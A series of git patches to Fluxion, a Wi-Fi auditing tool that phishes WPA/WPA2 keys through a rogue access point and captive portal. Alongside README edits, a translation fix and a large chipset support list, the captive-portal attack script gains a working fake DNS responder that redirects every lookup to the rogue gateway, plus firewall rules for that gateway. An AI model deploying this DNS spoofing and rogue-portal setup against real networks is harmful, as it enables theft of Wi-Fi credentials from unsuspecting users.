From 746b893b0d7a5a5bc8b37c2a94167128c575cf23 Mon Sep 17 00:00:00 2001 From: deltax Date: Sat, 17 Mar 2018 19:53:33 +0100 Subject: [PATCH 01/18] Add Discord link --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 879df77..0beca3f 100644 --- a/README.md +++ b/README.md @@ -3,7 +3,7 @@ # Fluxion is the future of MITM WPA attacks Fluxion is a security auditing and social-engineering research tool. It is a remake of linset by vk496 with (hopefully) less bugs and more functionality. The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phishing) attack. It's compatible with the latest release of Kali (rolling). Fluxion's attacks' setup is mostly manual, but experimental auto-mode handles some of the attacks' setup parameters. Read the [FAQ](https://github.com/FluxionNetwork/fluxion/wiki/FAQ) before requesting issues. -If you need quick help, fluxion is also avaible on gitter. You can talk with us [here](https://gitter.im/FluxionNetwork/Lobby) +If you need quick help, fluxion is also avaible on gitter. You can talk with us on [Gitter](https://gitter.im/FluxionNetwork/Lobby) or on [Discord](https://discord.gg/G43gptk). ## Installation Read [here](https://github.com/FluxionNetwork/fluxion/wiki/Generate-ssh-keys) before you do the following steps.
From 38ccf7e078f446bf18b401a464261d57338af3b2 Mon Sep 17 00:00:00 2001 From: deltax Date: Sat, 17 Mar 2018 23:20:14 +0100 Subject: [PATCH 02/18] Tweak README - Add some links (Discord,Gitter,Website) --- README.md | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 0beca3f..d11777b 100644 --- a/README.md +++ b/README.md @@ -70,4 +70,7 @@ For development I use vim and tmux. Here are my [dotfiles](https://github.com/de * Fluxion **DOES NOT WORK** on Linux Subsystem For Windows 10, because the subsystem doesn't allow access to network interfaces. Any Issue regarding the same would be **Closed Immediately** - +## Links +**Fluxion website:** https://fluxionnetwork.github.io/fluxion/
+**Discord:** https://discordapp.com/invite/G43gptk
+**Gitter:** https://gitter.im/FluxionNetwork/Lobby
From 7df9b9f3d60193544266c30e011d62ac5b1ffccd Mon Sep 17 00:00:00 2001 From: xihi <29686769+xisohi@users.noreply.github.com> Date: Tue, 27 Mar 2018 14:44:42 +0800 Subject: [PATCH 03/18] Update zh.sh --- language/zh.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/language/zh.sh b/language/zh.sh index 8f1da14..ba2fef4 100755 --- a/language/zh.sh +++ b/language/zh.sh @@ -21,7 +21,7 @@ FLUXIONMonitorModeWIEnabledNotice="${CGrn}Interface monitor mode enabled." FLUXIONMonitorModeWIFailedError="${CRed}Interface monitor mode failed!" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONStartingScannerNotice="启动扫描, 请稍等..." -FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the FLUXION Scanner." +FLUXIONStartingScannerTip="目标ap出现五秒后, 关闭FLUXION扫描" FLUXIONPreparingScannerResultsNotice="综合扫描的结果获取中,请稍等..." FLUXIONScannerFailedNotice="你的无线网卡好像不支持 (没有发现APs)" FLUXIONScannerDetectedNothingNotice="没有发现访问点, 请返回重试..." From 002a6f76a56882f2df22436ddff275780b331163 Mon Sep 17 00:00:00 2001 From: Tobias Manske Date: Thu, 5 Apr 2018 09:14:29 +0200 Subject: [PATCH 04/18] Fixed the Fluxion-Version parameter --- scripts/diagnostics.sh | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/scripts/diagnostics.sh b/scripts/diagnostics.sh index f766015..a5ee8fb 100755 --- a/scripts/diagnostics.sh +++ b/scripts/diagnostics.sh @@ -20,10 +20,10 @@ if [ ! "$1" ]; then fi echo "$HEADER_SIZE FLUXION Info" -if [ -f "fluxion" ];then - declare -r FLUXIONInfo=($(grep -oE "FLUXION(Version|Revision)=[0-9]+" fluxion)) +if [ -f "fluxion.sh" ];then + declare -r FLUXIONInfo=($(grep -oE "FLUXION(Version|Revision)=[0-9]+" fluxion.sh)) else - declare -r FLUXIONInfo=($(grep -oE "FLUXION(Version|Revision)=[0-9]+" ../fluxion)) + declare -r FLUXIONInfo=($(grep -oE "FLUXION(Version|Revision)=[0-9]+" ../fluxion.sh)) fi echo "FLUXION V${FLUXIONInfo[0]/*=/}.${FLUXIONInfo[1]/*=/}" echo -ne "\n\n" From 347bab9fceb457b38383f6e8a2f1e8f498e83bfe Mon Sep 17 00:00:00 2001 From: Tobias Manske Date: Thu, 5 Apr 2018 10:53:30 +0200 Subject: [PATCH 05/18] Improved DNS python script, made it PEP8 compliant --- attacks/Captive Portal/attack.sh | 71 +++++++++++++++++--------------- 1 file changed, 38 insertions(+), 33 deletions(-) diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index 2d49fd8..154a7d6 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -711,48 +711,53 @@ index-file.names = ( # Create a DNS service with python, forwarding all traffic to gateway. echo "\ +#!/usr/bin/env python2 +# -*- coding: utf-8 -*- + import socket + class DNSQuery: - def __init__(self, data): - self.data=data - self.dominio='' + def __init__(self, data): + self.data=data + self.dominio='' - tipo = (ord(data[2]) >> 3) & 15 - if tipo == 0: - ini=12 - lon=ord(data[ini]) - while lon != 0: - self.dominio+=data[ini+1:ini+lon+1]+'.' - ini+=lon+1 - lon=ord(data[ini]) + tipo = (ord(data[2]) >> 3) & 15 + if tipo == 0: + ini=12 + lon=ord(data[ini]) + while lon != 0: + self.dominio+=data[ini + 1:ini + lon + 1] + '.' + ini += lon + 1 + lon=ord(data[ini]) + + def respuesta(self, ip): + packet='' + if self.dominio: + packet+=self.data[:2] + '\x81\x80' + packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00' + packet+=self.data[12:] + packet+='\xc0\x0c' + packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' + packet+=str.join('', map(lambda x: chr(int(x)), ip.split('.'))) + return packet - def respuesta(self, ip): - packet='' - if self.dominio: - packet+=self.data[:2] + \"\x81\x80\" - packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00' - packet+=self.data[12:] - packet+='\xc0\x0c' - packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' - packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) - return packet if __name__ == '__main__': - ip='$CaptivePortalGatewayAddress' - print 'pyminifakeDwebconfNS:: dom.query. 60 IN A %s' % ip + ip='$CaptivePortalGatewayAddress' + print 'pyminifakeDwebconfNS:: dom.query. 60 IN A %s' % ip - udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - udps.bind(('',53)) + udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + udps.bind((ip, 53)) - try: - while 1: - data, addr = udps.recvfrom(1024) - p=DNSQuery(data) - udps.sendto(p.respuesta(ip), addr) - print 'Request: %s -> %s' % (p.dominio, ip) - except KeyboardInterrupt: - print 'Finalizando' + try: + while True: + data, addr = udps.recvfrom(1024) + p=DNSQuery(data) + udps.sendto(p.respuesta(ip), addr) + print 'Request: %s -> %s' % (p.dominio, ip) + except KeyboardInterrupt: + print 'Finalizando' udps.close()\ " >"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py" From 669e510b4466185dd356eea2aac9eaa3baf3cce3 Mon Sep 17 00:00:00 2001 From: Tobias Manske Date: Thu, 5 Apr 2018 10:56:56 +0200 Subject: [PATCH 06/18] Fixed and optimized iptables ruleset --- attacks/Captive Portal/attack.sh | 14 +++----------- 1 file changed, 3 insertions(+), 11 deletions(-) diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index 154a7d6..6742b39 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -1095,8 +1095,7 @@ captive_portal_unset_routes() { ip addr del $CaptivePortalGatewayAddress/24 dev $CaptivePortalAccessInterface 2>/dev/null } -# Set up DHCP / WEB server -# Set up DHCP / WEB server +# Set up DHCP / WEB server / DNS Firewall captive_portal_set_routes() { # Give an address to the gateway interface in the rogue network. # This makes the interface accessible from the rogue network. @@ -1112,15 +1111,8 @@ captive_portal_set_routes() { iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain - iptables -P FORWARD ACCEPT - - iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT \ - --to-destination $CaptivePortalGatewayAddress:80 - iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT \ - --to-destination $CaptivePortalGatewayAddress:443 - iptables -A INPUT -p tcp --sport 443 -j ACCEPT - iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT - iptables -t nat -A POSTROUTING -j MASQUERADE + iptables -A INPUT -p tcp --dport 443 -j ACCEPT + iptables -A INPUT -p udp --dport 53 -j ACCEPT } captive_portal_stop_interface() { From 75ab642358d13d6d27ba9c1a4adcbc826151869f Mon Sep 17 00:00:00 2001 From: Tobias Manske Date: Thu, 5 Apr 2018 11:02:23 +0200 Subject: [PATCH 07/18] Fixed and optimized iptables ruleset --- attacks/Captive Portal/attack.sh | 2 ++ 1 file changed, 2 insertions(+) diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index 6742b39..e859175 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -1112,7 +1112,9 @@ captive_portal_set_routes() { iptables --delete-chain iptables --table nat --delete-chain iptables -A INPUT -p tcp --dport 443 -j ACCEPT + iptables -A INPUT -p tcp --dport 80 -j ACCEPT iptables -A INPUT -p udp --dport 53 -j ACCEPT + iptables -A INPUT -p udp --dport 67 -j ACCEPT } captive_portal_stop_interface() { From 274721b624d79ea593b3a36b6a115fc29c2bd75a Mon Sep 17 00:00:00 2001 From: deltax Date: Fri, 6 Apr 2018 16:54:55 +0200 Subject: [PATCH 08/18] Upload and update chipset list - Make it easier if the chipset is suitable - Maybe auto check in the future. --- misc/devices.json | 2087 +++++++++++++++++++++++++++++++++++++++++++ misc/devices.xml | 2164 +++++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 4251 insertions(+) create mode 100644 misc/devices.json create mode 100644 misc/devices.xml diff --git a/misc/devices.json b/misc/devices.json new file mode 100644 index 0000000..280efdd --- /dev/null +++ b/misc/devices.json @@ -0,0 +1,2087 @@ +[ + { + "Manufacturer": "ADMtek", + "Chipset": "ADM8211, ADM8211B", + "Driver": "adm8211", + "PHY Modes": "b", + "Encrypt.": "WEP", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "PCI/CB", + "Notes": "currently broken AFAIK\nadm8211" + }, + { + "Manufacturer": "Agere", + "Chipset": "HERMES II (WL60010)", + "Driver": "wlags49_h2", + "PHY Modes": "b", + "Encrypt.": "?", + "Station": "y", + "Ad-hoc": "?", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "PCI/ PCMCIA", + "Notes": "staging (vendor) driver\nwlags49_h2" + }, + { + "Manufacturer": "Agere", + "Chipset": "HERMES II.5 (WL60040)", + "Driver": "wlags49_h25", + "PHY Modes": "(a)/b/g", + "Encrypt.": "?", + "Station": "y", + "Ad-hoc": "?", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "PCI/ PCMCIA", + "Notes": "staging (vendor) driver, not all devices supported\nwlags49_h25" + }, + { + "Manufacturer": "Airgo", + "Chipset": "AGN100/AGN300 pre-N", + "Driver": "agnx", + "PHY Modes": "(a)b/g", + "Encrypt.": "", + "Station": "n", + "Ad-hoc": "n", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "PCI/CB", + "Notes": "driver never completed, abandoned\nagnx" + }, + { + "Manufacturer": "Airgo", + "Chipset": "AGN300 pre-N USB", + "Driver": "none", + "PHY Modes": "b/g", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "USB 2.0", + "Notes": "devices not common" + }, + { + "Manufacturer": "Aironet /\nCisco", + "Chipset": "4500, 4800,\nCisco 340/350", + "Driver": "airo", + "PHY Modes": "b", + "Encrypt.": "WEP, WPA-TKIP", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "n", + "Monitor": "y", + "Inj.": "n", + "Bus": "ISA/PCI /PCMCIA", + "Notes": "airo" + }, + { + "Manufacturer": "ALi", + "Chipset": "M4301A", + "Driver": "none", + "PHY Modes": "b", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI/CB", + "Notes": "devices not common (mainly WUSB11 v4)" + }, + { + "Manufacturer": "AMD", + "Chipset": "Alchemy AM1772", + "Driver": "none", + "PHY Modes": "b", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI/CB", + "Notes": "see this abomination" + }, + { + "Manufacturer": "Atheros", + "Chipset": "", + "Driver": "", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Atheros", + "Chipset": "AR5000", + "Driver": "ath5k", + "PHY Modes": "a", + "Encrypt.": "", + "Station": "b", + "Ad-hoc": "b", + "AP": "b", + "Mesh": "b", + "Monitor": "y", + "Inj.": "b", + "Bus": "PCI/CB", + "Notes": "tx support currently broken\nath5k" + }, + { + "Manufacturer": "Atheros", + "Chipset": "AR5001A-AR5007EG", + "Driver": "ath5k", + "PHY Modes": "(a)/b/(g)", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "y", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCI/PCIe /CB", + "Notes": "ath5k" + }, + { + "Manufacturer": "Atheros", + "Chipset": "AR5000-AR5007EG", + "Driver": "madwifi", + "PHY Modes": "(a)/b/(g)", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "?", + "Monitor": "y", + "Inj.": "?", + "Bus": "PCI/PCIe /CB", + "Notes": "superseded by ath5k" + }, + { + "Manufacturer": "Atheros", + "Chipset": "AR5513\n(Data Falcon)", + "Driver": "none", + "PHY Modes": "(a)/b/g", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI/CB", + "Notes": "somewhat relevant" + }, + { + "Manufacturer": "Atheros", + "Chipset": "AR5005U (AR5523)", + "Driver": "ar5523", + "PHY Modes": "(a)/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "n", + "Ad-hoc": "n", + "AP": "n", + "Mesh": "n", + "Monitor": "y", + "Inj.": "n", + "Bus": "USB 2.0", + "Notes": "driver never completed, 5GHz mode non-functional?\nar5523" + }, + { + "Manufacturer": "Atheros", + "Chipset": "AR5005U (AR5523)", + "Driver": "athusbwlan", + "PHY Modes": "(a)/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "USB 2.0", + "Notes": "obsolete vendor driver" + }, + { + "Manufacturer": "Atheros", + "Chipset": "AR9001U \n(AR9170)", + "Driver": "carl9170", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "n", + "Monitor": "y", + "Inj.": "y", + "Bus": "USB 2.0", + "Notes": "carl9170" + }, + { + "Manufacturer": "Atheros", + "Chipset": "AR600x", + "Driver": "ar6k", + "PHY Modes": "(a)/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "SDIO", + "Notes": "" + }, + { + "Manufacturer": "Atheros", + "Chipset": "AR6003", + "Driver": "ath6kl", + "PHY Modes": "a/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "?", + "Bus": "SDIO", + "Notes": "driver currently in staging\n0271:0402\nath6kl" + }, + { + "Manufacturer": "Atheros", + "Chipset": "AR9374", + "Driver": "ath6kl", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "USB 2.0", + "Notes": "0cf3:9375\nath6kl" + }, + { + "Manufacturer": "Atheros", + "Chipset": "AR2427+AR5008\n+AR900x", + "Driver": "ath9k", + "PHY Modes": "(a)/b/g/(n)", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "y", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCI/PCIe /CB", + "Notes": "fcs check broken in monitor mode since ~2.6.33\nath9k" + }, + { + "Manufacturer": "Atheros", + "Chipset": "AR9002U \n(AR9271, AR7010)", + "Driver": "ath9k_htc", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "y", + "Monitor": "y", + "Inj.": "y", + "Bus": "USB 2.0", + "Notes": "0411:0197\nath9k_htc" + }, + { + "Manufacturer": "Qualcomm Atheros", + "Chipset": "QCA6164, QCA6174,\nQCA9880 v2, QCA9882 v2\nQCA9890 v2, QCA9892 v2", + "Driver": "ath10k", + "PHY Modes": "a/b/g/n (+ac)", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "n", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCIe", + "Notes": "+3.11 (4.3)\n168c:003e\n168c:0041\nath10k" + }, + { + "Manufacturer": "Qualcomm Atheros", + "Chipset": "Wilocity Wil6210\n802.11ad 60GHz", + "Driver": "wil6210", + "PHY Modes": "a/b/g/n (+ac+ad)", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCIe", + "Notes": "wil6210" + }, + { + "Manufacturer": "Qualcomm", + "Chipset": "WFB400", + "Driver": "none", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI/ PCIe/ CB/ USB 2.0", + "Notes": "unknown if released,\nAirgo AGN400" + }, + { + "Manufacturer": "Atmel", + "Chipset": "", + "Driver": "", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Atmel", + "Chipset": "AT76C502A", + "Driver": "atmel", + "PHY Modes": "b", + "Encrypt.": "WEP", + "Station": "y", + "Ad-hoc": "?", + "AP": "n", + "Mesh": "n", + "Monitor": "?", + "Inj.": "n", + "Bus": "PCMCIA", + "Notes": "atmel cs" + }, + { + "Manufacturer": "Atmel", + "Chipset": "AT76C503A, AT76C505(A)", + "Driver": "at76c50x-usb", + "PHY Modes": "b", + "Encrypt.": "WEP", + "Station": "y", + "Ad-hoc": "n", + "AP": "n", + "Mesh": "n", + "Monitor": "beacons", + "Inj.": "n", + "Bus": "USB 1.0", + "Notes": "at76c50x-usb" + }, + { + "Manufacturer": "Broadcom", + "Chipset": "", + "Driver": "", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Broadcom", + "Chipset": "BCM4301, BCM4307, BCM4306r2", + "Driver": "b43legacy", + "PHY Modes": "b/(g)", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "y", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCI/CB/ PCMCIA", + "Notes": "ssb\nb43legacy" + }, + { + "Manufacturer": "Broadcom", + "Chipset": "BCM4306r3, BCM4311, BCM4312, BCM4309, BCM4318(E), BCM4321, BCM4322", + "Driver": "b43", + "PHY Modes": "(a)/b/g/(n)", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "y", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCI/PCIe /CB", + "Notes": "ssb, no HT mode support\nb43" + }, + { + "Manufacturer": "Broadcom", + "Chipset": "BCM43224, BCM43225, BCM4331", + "Driver": "b43", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "y", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCIe", + "Notes": "bcma, no HT mode support, no current 5GHz support\nb43" + }, + { + "Manufacturer": "Broadcom", + "Chipset": "BCM4311, BCM4313, BCM4321, BCM4322, BCM4322x, BCM43225, BCM43227, BCM43228", + "Driver": "wl", + "PHY Modes": "(a)/b/g/(n)", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "PCIe", + "Notes": "vendor driver\nwl" + }, + { + "Manufacturer": "Broadcom", + "Chipset": "BCM4320 and other\nrndis variants", + "Driver": "rndis_wlan", + "PHY Modes": "b/g", + "Encrypt.": "", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "USB 2.0", + "Notes": "rndis wlan" + }, + { + "Manufacturer": "Broadcom", + "Chipset": "BCM4323x", + "Driver": "none", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "USB 2.0", + "Notes": "possible future support w/ brcmfmac? (probably not)" + }, + { + "Manufacturer": "Broadcom", + "Chipset": "BCM43235, BCM43236, BCM43238 \n(chip revision dependent)", + "Driver": "brcmfmac", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "y", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "n", + "Inj.": "n", + "Bus": "USB 2.0", + "Notes": "patch adding support recently added\nbrcmfmac" + }, + { + "Manufacturer": "Broadcom", + "Chipset": "BCM4326U", + "Driver": "none", + "PHY Modes": "b/g", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "USB 2.0", + "Notes": "" + }, + { + "Manufacturer": "Broadcom", + "Chipset": "BCM4329", + "Driver": "brcmfmac", + "PHY Modes": "a/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "n", + "Inj.": "n", + "Bus": "SDIO", + "Notes": "brcmfmac" + }, + { + "Manufacturer": "Broadcom", + "Chipset": "BCM43224, BCM43225", + "Driver": "brcmsmac", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "y", + "Inj.": "?", + "Bus": "PCIe", + "Notes": "BCMA\nbrcmsmac" + }, + { + "Manufacturer": "Conexant", + "Chipset": "", + "Driver": "", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Conexant", + "Chipset": "CX53111", + "Driver": "none", + "PHY Modes": "b/g", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "SDIO", + "Notes": "" + }, + { + "Manufacturer": "Conexant", + "Chipset": "CX53822", + "Driver": "none", + "PHY Modes": "(a)/b/g", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "CF", + "Notes": "" + }, + { + "Manufacturer": "Envara", + "Chipset": "WiND502/512", + "Driver": "none", + "PHY Modes": "(a)/b/g", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "USB 2.0", + "Notes": "WiND512 (b/g) devices common" + }, + { + "Manufacturer": "Inprocomm", + "Chipset": "IPN2120, IPN2220", + "Driver": "none", + "PHY Modes": "b/(g)", + "Encrypt.": "?", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI/CB", + "Notes": "" + }, + { + "Manufacturer": "Inprocomm", + "Chipset": "IPN2128", + "Driver": "none", + "PHY Modes": "b", + "Encrypt.": "?", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "SDIO", + "Notes": "" + }, + { + "Manufacturer": "Intel", + "Chipset": "", + "Driver": "", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Intel", + "Chipset": "PRO/Wireless 2100B", + "Driver": "ipw2100", + "PHY Modes": "b", + "Encrypt.": "?", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "n", + "Monitor": "y", + "Inj.": "?", + "Bus": "PCI", + "Notes": "ipw2100" + }, + { + "Manufacturer": "Intel", + "Chipset": "PRO/Wireless 2200BG, 2915ABG", + "Driver": "ipw2200", + "PHY Modes": "(a)/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "oot", + "Mesh": "n", + "Monitor": "?", + "Inj.": "?", + "Bus": "PCI", + "Notes": "ipw2200" + }, + { + "Manufacturer": "Intel", + "Chipset": "PRO/Wireless 3945ABG", + "Driver": "iwl3945", + "PHY Modes": "a/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "n", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCI", + "Notes": "iwl3945" + }, + { + "Manufacturer": "Intel", + "Chipset": "Wireless WiFi Link 4965AGN", + "Driver": "iwl4965", + "PHY Modes": "a/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "n", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCI", + "Notes": "iwl4965" + }, + { + "Manufacturer": "Intel", + "Chipset": "WiFi Link 5100, 5150, 5300, 5350 - Centrino 100, 130, 1000, 1030, 6150, 6200, 6250, 6300", + "Driver": "iwlagn", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "n", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCI", + "Notes": "iwlagn\niwlwifi" + }, + { + "Manufacturer": "Intel", + "Chipset": "IWMC3200 (Evans Peak)", + "Driver": "iwmc3200", + "PHY Modes": "a/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "SDIO", + "Notes": "iwmc3200" + }, + { + "Manufacturer": "Intersil", + "Chipset": "", + "Driver": "", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Intersil", + "Chipset": "PRISM 2/2.5/3 \nPCI/CF/PCMCIA", + "Driver": "hostap", + "PHY Modes": "b", + "Encrypt.": "?", + "Station": "y", + "Ad-hoc": "?", + "AP": "y", + "Mesh": "n", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCI/CB /USB", + "Notes": "hostap" + }, + { + "Manufacturer": "Intersil", + "Chipset": "PRISM 2.5/3 USB", + "Driver": "prism2_usb", + "PHY Modes": "b", + "Encrypt.": "WEP", + "Station": "y", + "Ad-hoc": "?", + "AP": "n", + "Mesh": "n", + "Monitor": "y", + "Inj.": "b", + "Bus": "PCI/CB /USB", + "Notes": "staging driver from linux-wlan-ng\nprism2 usb" + }, + { + "Manufacturer": "Intersil", + "Chipset": "ISL3877, ISL3880,\nISL3890, ISL3886", + "Driver": "p54pci", + "PHY Modes": "(a)/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "y", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCI/CB", + "Notes": "p54pci" + }, + { + "Manufacturer": "Intersil", + "Chipset": "ISL3880/ISL3886\n+ NET2280, ISL3887", + "Driver": "p54usb", + "PHY Modes": "(a)/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "y", + "Monitor": "y", 